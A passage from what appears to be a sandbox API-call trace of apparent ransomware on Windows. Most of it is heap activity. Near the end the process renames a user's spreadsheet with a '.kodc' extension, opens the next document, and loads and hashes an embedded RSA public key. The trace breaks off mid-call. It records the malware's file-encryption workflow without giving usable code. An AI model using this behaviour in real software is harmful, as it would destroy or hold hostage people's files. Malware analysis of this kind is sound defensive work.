[0098.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cef8 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a910 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9cf40 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a928 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a958 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.277] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a958 | out: hHeap=0x630000) returned 1 [0098.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a970 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a958 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a958 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.278] GetCurrentThreadId () returned 0x42c [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e938 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.278] GetCurrentThreadId () returned 0x42c [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a958 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a970 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a940 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a988 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a958 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a958 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a958 | out: hHeap=0x630000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a988 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a970 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a940 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9cf40 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.282] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x4c9a, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x4c9a, lpOverlapped=0x0) returned 1 [0098.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.282] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4c9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.282] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.283] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.283] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.283] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.283] CloseHandle (hObject=0x5cc) returned 1 [0098.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.284] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gKkONhl _4JIuyPA7g.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gkkonhl _4jiuypa7g.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gKkONhl _4JIuyPA7g.xlsx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gkkonhl _4jiuypa7g.xlsx.kodc")) returned 1 [0098.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.285] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.285] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.286] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5a1de30, ftCreationTime.dwHighDateTime=0x1d5b9fc, ftLastAccessTime.dwLowDateTime=0x201f80b0, ftLastAccessTime.dwHighDateTime=0x1d5bd4b, ftLastWriteTime.dwLowDateTime=0x201f80b0, ftLastWriteTime.dwHighDateTime=0x1d5bd4b, nFileSizeHigh=0x0, nFileSizeLow=0x6a14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gqgz7 KyiyA9wCH9lS.odt", cAlternateFileName="GQGZ7K~1.ODT")) returned 1 [0098.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.287] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqgz7 KyiyA9wCH9lS.odt") returned=".odt" [0098.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqgz7 KyiyA9wCH9lS.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqgz7 kyiya9wch9ls.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.287] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=27156) returned 1 [0098.287] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.290] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x69ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.290] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.291] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.291] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x6a14, lpOverlapped=0x0) returned 1 [0098.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.292] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.292] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.292] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.292] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.293] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.293] GetLastError () returned 0x0 [0098.293] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.293] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.293] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.293] UuidCreate (in: 